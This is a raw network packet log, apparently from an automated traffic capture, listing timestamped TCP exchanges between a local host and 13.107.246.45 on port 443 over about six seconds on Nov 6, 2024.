                                              Nov 6, 2024 17:03:31.647696972 CET4435018113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.650998116 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.651016951 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.651077032 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.651211023 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.651221991 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.673998117 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.674290895 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.674355984 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.674388885 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.674401999 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.674412012 CET50182443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.674417019 CET4435018213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.676903963 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.676940918 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:31.676990032 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.677225113 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:31.677237034 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.375350952 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.375981092 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.376017094 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.376547098 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.376552105 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.414176941 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.414679050 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.414699078 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.415096998 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.415102005 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.504452944 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.504537106 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.504642010 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.504719973 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.504739046 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.504914999 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.504931927 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.504940987 CET50183443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.504945993 CET4435018313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.507981062 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.508023024 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.508141994 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.508312941 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.508330107 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.552803993 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.552874088 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.553046942 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.553157091 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.553174019 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.553190947 CET50184443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.553196907 CET4435018413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.556147099 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.556178093 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:32.556258917 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.556416988 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:32.556427002 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.256217957 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.256802082 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.256874084 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.257276058 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.257282972 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.290328026 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.294245005 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.294267893 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.294655085 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.294660091 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.389590025 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.389664888 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.389766932 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.389794111 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.389868975 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.390069008 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.390091896 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.390103102 CET50185443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.390109062 CET4435018513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.393105030 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.393147945 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.393245935 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.393410921 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.393424988 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.440330029 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.440417051 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.440466881 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.440586090 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.440608025 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.440618992 CET50186443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.440624952 CET4435018613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.443165064 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.443208933 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.443274021 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.443515062 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.443531990 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.496265888 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.536505938 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.536525965 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.536828041 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.536845922 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.536859035 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.537131071 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.537184954 CET4435012513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.537230015 CET50125443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.539751053 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.539788008 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:33.539856911 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.539999008 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:33.540011883 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.140364885 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.141206026 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.141247034 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.141825914 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.141830921 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.237365961 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.238251925 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.238281012 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.238821983 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.238826990 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.273979902 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.274008989 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.274065971 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.274080038 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.274126053 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.274360895 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.274389029 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.274405003 CET50187443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.274409056 CET4435018713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.277528048 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.277586937 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.277686119 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.277863979 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.277879000 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.283972025 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.284444094 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.284467936 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.284904957 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.284913063 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.376657963 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.376766920 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.376884937 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.377170086 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.377186060 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.377198935 CET50188443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.377203941 CET4435018813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.379962921 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.379995108 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.380064964 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.380366087 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.380377054 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.420481920 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.420505047 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.420629025 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.420639038 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.420919895 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.420928001 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.420937061 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.420984030 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.421036005 CET4435018913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.421076059 CET50189443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.423794985 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.423821926 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:34.423896074 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.424043894 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:34.424057961 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.000089884 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.000680923 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.000709057 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.001137018 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.001142979 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.115978003 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.116461039 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.116489887 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.116945028 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.116950989 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.157119036 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.157586098 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.157610893 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.158052921 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.158057928 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.217511892 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.217539072 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.217595100 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.217653990 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.217709064 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.217917919 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.217940092 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.217959881 CET50190443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.217967033 CET4435019013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.220762014 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.220813036 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.220911026 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.221081018 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.221096992 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.246597052 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.246643066 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.246700048 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.246762991 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.246807098 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.247057915 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.247081995 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.247113943 CET50191443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.247126102 CET4435019113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.249710083 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.249771118 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.249860048 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.250005007 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.250024080 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.288645029 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.288712025 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.288800955 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.288979053 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.288999081 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.289010048 CET50192443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.289015055 CET4435019213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.291693926 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.291737080 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.291830063 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.291984081 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.292001009 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.957911015 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.958513975 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.958544016 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:35.959079027 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:35.959084988 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.000077963 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.000617981 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.000653028 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.001085043 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.001096010 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.036446095 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.037022114 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.037056923 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.037470102 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.037477970 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.113739967 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.113775015 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.113823891 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.113908052 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.113945007 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.114248991 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.114274979 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.114290953 CET50193443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.114299059 CET4435019313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.116962910 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.117017031 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.117110968 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.117247105 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.117254019 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.130475044 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.130548000 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.130603075 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.130723953 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.130744934 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.130764008 CET50194443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.130770922 CET4435019413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.132787943 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.132822990 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.132894039 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.133019924 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.133032084 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.168873072 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.169390917 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.169434071 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.169466972 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.169500113 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.169553041 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.169572115 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.169583082 CET50195443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.169589043 CET4435019513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.171833992 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.171885014 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.171956062 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.172089100 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.172101974 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.847069979 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.847475052 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.847501040 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.847918987 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.847923994 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.876003981 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.876441956 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.876455069 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.876904011 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.876909018 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.914185047 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.914638042 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.914663076 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.915222883 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.915227890 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.977529049 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.978142023 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.978224993 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.978247881 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.978265047 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.978280067 CET50196443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.978286028 CET4435019613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.980917931 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.980969906 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:36.981028080 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.981190920 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:36.981204033 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.008599997 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.008634090 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.008667946 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.008676052 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.008687973 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.008727074 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.008877993 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.008888006 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.008905888 CET50197443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.008909941 CET4435019713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.011204004 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.011245012 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.011301041 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.011450052 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.011461973 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.045548916 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.045686960 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.045743942 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.045794010 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.045811892 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.045825005 CET50198443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.045830011 CET4435019813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.048172951 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.048223019 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.048305035 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.048439980 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.048455000 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.730073929 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.730600119 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.730617046 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.731029034 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.731035948 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.763550043 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.763964891 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.763989925 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.764319897 CET50200443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.764326096 CET4435020013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.830326080 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.830967903 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.830990076 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.831403971 CET50201443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.831408978 CET4435020113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.860955954 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.861000061 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.861041069 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.861093044 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.861120939 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.861354113 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.861370087 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.861382008 CET50199443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.861388922 CET4435019913.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.864309072 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.864348888 CET4435020213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:03:37.864447117 CET50202443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:03:37.864608049 CET50202443192.168.2.613.107.246.45
